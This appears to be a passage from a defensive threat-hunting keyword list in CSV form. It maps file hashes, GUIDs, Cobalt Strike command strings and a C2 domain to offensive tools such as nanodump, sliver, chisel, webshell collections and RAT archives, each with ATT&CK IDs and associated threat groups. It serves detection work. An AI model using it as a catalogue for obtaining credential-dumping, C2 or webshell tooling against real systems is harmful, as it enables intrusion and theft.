"*bdllload*",".{0,1000}bdllload.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35582"
"*bdllload*",".{0,1000}bdllload.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35583"
"*bdllspawn*",".{0,1000}bdllspawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35584"
"*bdllspawn*",".{0,1000}bdllspawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35585"
"*bdtryujndyund6e5.azurewebsites.net*",".{0,1000}bdtryujndyund6e5\.azurewebsites\.net.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","35586"
"*be038bcb58b9e744c9821823ac59c3d9f4cc9456f445c41a840b7a6acbc21fc3*",".{0,1000}be038bcb58b9e744c9821823ac59c3d9f4cc9456f445c41a840b7a6acbc21fc3.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","35587"
"*be03dfd28d37a8c444de321828edef417638c767a2a167133c5bf3a0b51ad60c*",".{0,1000}be03dfd28d37a8c444de321828edef417638c767a2a167133c5bf3a0b51ad60c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35588"
"*be041565c155ce5a9129e2d79a2c8d18acf4143a7f3aa2237c15a15a89b6625e*",".{0,1000}be041565c155ce5a9129e2d79a2c8d18acf4143a7f3aa2237c15a15a89b6625e.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","#filehash","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","35589"
"*be0815883380c13d0a6855395acf07270cdbf4c8e13018439cffacd8e52485c6*",".{0,1000}be0815883380c13d0a6855395acf07270cdbf4c8e13018439cffacd8e52485c6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35590"
"*be09f42e9225e82fe619a700b93d33e3bf0603266b7865d45a786630d4303aa7*",".{0,1000}be09f42e9225e82fe619a700b93d33e3bf0603266b7865d45a786630d4303aa7.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","#filehash","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","35591"
"*be1329d07bf1b6f6558c7f95103c773d70eb68d652c4da6143f581332141a954*",".{0,1000}be1329d07bf1b6f6558c7f95103c773d70eb68d652c4da6143f581332141a954.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35592"
"*be1c2b305595e848c387fc8aa5c7ca24fc8104c21aaaad5c3c9fef50e57668db*",".{0,1000}be1c2b305595e848c387fc8aa5c7ca24fc8104c21aaaad5c3c9fef50e57668db.{0,1000}","offensive_tool_keyword","PrivFu","Kernel Mode WinDbg extension for token privilege edit","T1055 - T1078 - T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivEditor","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","35594"
"*be224373f60705c94e87de8024ae646302fc29643e3f1f15ab0e84f1c375353b*",".{0,1000}be224373f60705c94e87de8024ae646302fc29643e3f1f15ab0e84f1c375353b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35596"
"*be26213aa79b0c414ff4566b23bccef80d7b5a8bb8a022b5b64c2ca3a5659ac1*",".{0,1000}be26213aa79b0c414ff4566b23bccef80d7b5a8bb8a022b5b64c2ca3a5659ac1.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35598"
"*be28f0c338095b629bfd563abd38c472c6b88618c3647a97c79f6c78cf620e15*",".{0,1000}be28f0c338095b629bfd563abd38c472c6b88618c3647a97c79f6c78cf620e15.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","35599"
"*be3345a2cedd13aae147564426bb743332b2053868ba7c3e64f14c247416f86c*",".{0,1000}be3345a2cedd13aae147564426bb743332b2053868ba7c3e64f14c247416f86c.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","35600"
"*be3ae8e7cd4138850830f1d0b40cb409160a4449dda205a325c95de7bd2b76b0*",".{0,1000}be3ae8e7cd4138850830f1d0b40cb409160a4449dda205a325c95de7bd2b76b0.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35601"
"*be46cdf9a5079ad20e237f131383bae6873297c3cff36ccdde274c1b78935810*",".{0,1000}be46cdf9a5079ad20e237f131383bae6873297c3cff36ccdde274c1b78935810.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35603"
"*be46cdf9a5079ad20e237f131383bae6873297c3cff36ccdde274c1b78935810*",".{0,1000}be46cdf9a5079ad20e237f131383bae6873297c3cff36ccdde274c1b78935810.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35604"
"*be515aac4a4c52e55708baa77fab03d9f6ab2e7045d7147f83aa07cafb448180*",".{0,1000}be515aac4a4c52e55708baa77fab03d9f6ab2e7045d7147f83aa07cafb448180.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","35607"
"*be5cfdd35404d90af8b73a2c53fcc2e2ca3aafb2af4f5484b8aea25f8cb60e73*",".{0,1000}be5cfdd35404d90af8b73a2c53fcc2e2ca3aafb2af4f5484b8aea25f8cb60e73.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","35611"
"*be5f14ffdc5bb327e53934a9ef6c55500e8d4ffd920a77df0b6ae209793567a5*",".{0,1000}be5f14ffdc5bb327e53934a9ef6c55500e8d4ffd920a77df0b6ae209793567a5.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","35612"
"*be642266-f34d-43c3-b6e4-eebf8e489519*",".{0,1000}be642266\-f34d\-43c3\-b6e4\-eebf8e489519.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#GUIDproject","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","35614"
"*be6556cd585cd39c332fb5ed6881b5766af3bb01d0276835e172e81d04f06237*",".{0,1000}be6556cd585cd39c332fb5ed6881b5766af3bb01d0276835e172e81d04f06237.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35615"
"*be6d0dc445a00098d6cfbc537423ce23c49b4b08d530ea11709e617636c883a0*",".{0,1000}be6d0dc445a00098d6cfbc537423ce23c49b4b08d530ea11709e617636c883a0.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35616"
"*be6d43b84e5b69c33f6e155d0e7be48bb3da4a322d19feac4073ef14b845f9fa*",".{0,1000}be6d43b84e5b69c33f6e155d0e7be48bb3da4a322d19feac4073ef14b845f9fa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35617"
"*be76da790e34b58cd8f35913154aa4d4a749372918cd00324993370bd086ba5a*",".{0,1000}be76da790e34b58cd8f35913154aa4d4a749372918cd00324993370bd086ba5a.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","#filehash","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","35619"
"*be7732144c35e08d90a04d6d668c29b4341a44428b3d9c08ae69865bd3b97f17*",".{0,1000}be7732144c35e08d90a04d6d668c29b4341a44428b3d9c08ae69865bd3b97f17.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","35620"
"*be7fdcbd1dee825a6adba54c5f2b72fb4000cb474c834d07e1f0f293d54e1f58*",".{0,1000}be7fdcbd1dee825a6adba54c5f2b72fb4000cb474c834d07e1f0f293d54e1f58.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35621"
"*BE801141-0D4D-4950-85C8-8E93C9D3312F*",".{0,1000}BE801141\-0D4D\-4950\-85C8\-8E93C9D3312F.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35622"
"*be93d296832c123ba18b2f43629dae79956b203386edfef96e180470259fa417*",".{0,1000}be93d296832c123ba18b2f43629dae79956b203386edfef96e180470259fa417.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35624"
"*be9b10dddf393c3c4abe05f9237a0e97a8697da407505b192c4385f01e8d9615*",".{0,1000}be9b10dddf393c3c4abe05f9237a0e97a8697da407505b192c4385f01e8d9615.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35625"
"*be9b23c9cf6731a8ae3d288871d277e64ca0caa5020433c4516b58e10f5e641f*",".{0,1000}be9b23c9cf6731a8ae3d288871d277e64ca0caa5020433c4516b58e10f5e641f.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","35626"
"*be9bee58f25350d6047bcb9de5b38957d7591c7b048ddd0a2e69162252516a54*",".{0,1000}be9bee58f25350d6047bcb9de5b38957d7591c7b048ddd0a2e69162252516a54.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35627"
"*be9cd67ca6ef0d87c8dacebef75d1f62b38cff5b8ba4ad2f0eb382ab54081317*",".{0,1000}be9cd67ca6ef0d87c8dacebef75d1f62b38cff5b8ba4ad2f0eb382ab54081317.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","35628"
"*Beacon Payload Generator*",".{0,1000}Beacon\sPayload\sGenerator.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","#content","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","35631"
